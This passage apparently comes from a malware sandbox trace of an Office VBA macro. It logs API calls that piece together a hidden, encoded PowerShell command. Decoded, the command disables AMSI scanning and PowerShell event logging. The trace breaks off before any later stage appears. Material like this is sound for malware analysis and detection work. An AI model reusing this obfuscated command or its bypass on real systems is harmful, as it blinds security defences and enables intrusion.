cbMultiByte=11, lpWideCharStr=0x5fff364370, cchWideChar=12 | out: lpWideCharStr="_B_var_asd") returned 11 [0175.806] _mbscpy_s (in: _Dst=0x5fff364530, _DstSizeInBytes=0x4, _Src=0x1fe1bfe2bb2 | out: _Dst=0x5fff364530) returned 0x0 [0175.806] memcpy (in: _Dst=0x1fe1895faa0, _Src=0x7fffd860a8f8, _Size=0x18 | out: _Dst=0x1fe1895faa0) returned 0x1fe1895faa0 [0175.806] CRetailMalloc_Free () returned 0x1 [0175.807] memcpy (in: _Dst=0x1fe1895fab8, _Src=0x7fffd860a8f8, _Size=0x18 | out: _Dst=0x1fe1895fab8) returned 0x1fe1895fab8 [0175.807] memcpy (in: _Dst=0x1fe1895fad0, _Src=0x7fffd860a8f8, _Size=0x18 | out: _Dst=0x1fe1895fad0) returned 0x1fe1895fad0 [0175.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Run", cbMultiByte=5, lpWideCharStr=0x5fff3641d0, cchWideChar=4 | out: lpWideCharStr="Run") returned 0 [0175.807] wcscpy_s (in: _Destination=0x1fe1af9b328, _SizeInWords=0x4, _Source="Run" | out: _Destination="Run") returned 0x0 [0175.808] memcpy (in: _Dst=0x1fe1afa0ae8, _Src=0x1fe1afa09e8, _Size=0x200 | out: _Dst=0x1fe1afa0ae8) returned 0x1fe1afa0ae8 [0175.810] memcpy (in: _Dst=0x1fe1afa0ce8, _Src=0x1fe1afa0ae8, _Size=0x400 | out: _Dst=0x1fe1afa0ce8) returned 0x1fe1afa0ce8 [0175.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fffd8609cd0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0175.811] CRetailMalloc_Free () returned 0x1 [0175.811] GetCurrentProcess () returned 0xffffffffffffffff [0175.811] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8d791, dwSize=0x8) returned 1 [0175.811] GetCurrentProcess () returned 0xffffffffffffffff [0175.811] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8d790, dwSize=0x8) returned 1 [0175.811] GetCurrentProcess () returned 0xffffffffffffffff [0175.811] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8f7f9, dwSize=0x8) returned 1 [0175.811] GetCurrentProcess () returned 0xffffffffffffffff [0175.811] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8f7f8, dwSize=0x8) returned 1 [0175.811] GetCurrentProcess () returned 0xffffffffffffffff [0175.811] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8f808, dwSize=0x2) returned 1 [0175.811] GetCurrentProcess () returned 0xffffffffffffffff [0175.811] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8f85c, dwSize=0x45) returned 1 [0175.811] VirtualProtect (in: lpAddress=0x1fe1af8f85c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x5fff36458c | out: lpflOldProtect=0x5fff36458c*=0x40) returned 1 [0175.812] GetCurrentProcess () returned 0xffffffffffffffff [0175.812] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8d791, dwSize=0x8) returned 1 [0175.812] GetCurrentProcess () returned 0xffffffffffffffff [0175.812] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8d790, dwSize=0x8) returned 1 [0175.812] GetCurrentProcess () returned 0xffffffffffffffff [0175.812] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8d7a0, dwSize=0x2) returned 1 [0175.812] GetCurrentProcess () returned 0xffffffffffffffff [0175.812] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8d7f4, dwSize=0x4d) returned 1 [0175.812] VirtualProtect (in: lpAddress=0x1fe1af8d7f4, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x5fff36458c | out: lpflOldProtect=0x5fff36458c*=0x40) returned 1 [0175.816] SetErrorMode (uMode=0x8001) returned 0x8005 [0175.816] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0175.816] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7fffd8240000 [0175.817] DeactivateActCtx (dwFlags=0x0, ulCookie=0x120f90c300000217) returned 1 [0175.817] SetErrorMode (uMode=0x8005) returned 0x8005 [0175.818] GetProcAddress (hModule=0x7fffd8240000, lpProcName=0x2cc) returned 0x7fffd8579158 [0175.818] GetCurrentProcess () returned 0xffffffffffffffff [0175.818] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af9b2b4, dwSize=0x4b) returned 1 [0175.818] RtlLookupFunctionEntry (in: ControlPc=0x1fe1af9b2b4, ImageBase=0x5fff364418, HistoryTable=0x5fff364420 | out: ImageBase=0x5fff364418, HistoryTable=0x5fff364420) returned 0x0 [0175.818] VirtualProtect (in: lpAddress=0x1fe1af9b2b4, dwSize=0x4c, flNewProtect=0x40, lpflOldProtect=0x5fff36451c | out: lpflOldProtect=0x5fff36451c*=0x4) returned 1 [0175.819] RtlAddFunctionTable (FunctionTable=0x1fe1af9b30c, EntryCount=0x1, BaseAddress=0x1fe1af9b200, TargetGp=0x40) returned 1 [0175.822] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg", bstrRight="BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.822] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp", bstrRight="AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAG", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.822] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAG", bstrRight="UAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.822] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcA", bstrRight="ZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.822] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ", bstrRight="BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBB", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.822] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBB", bstrRight="AG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAH", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.822] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAH", bstrRight="QARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.822] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkA", bstrRight="bABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQ", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.822] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQ", bstrRight="B0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBs", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.823] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBs", bstrRight="AGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAG", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.823] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAG", bstrRight="kAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.823] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcA", bstrRight="LgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.823] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdA", bstrRight="BGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAn", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.823] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAn", bstrRight="AE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlAC", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.823] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlAC", bstrRight="cAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.824] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEA", bstrRight="cwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQ", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.824] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQ", bstrRight="BzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.824] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0", bstrRight="AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAE", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.824] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAE", bstrRight="UAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUA", pbstrResult=0x5fff365ce0 | out: pbstrResult=0x5fff365ce0) returned 0x0 [0175.824] VarBstrCat (in: bstrLeft="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAGUAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBsAGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcALgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdABGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAEUAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUA", 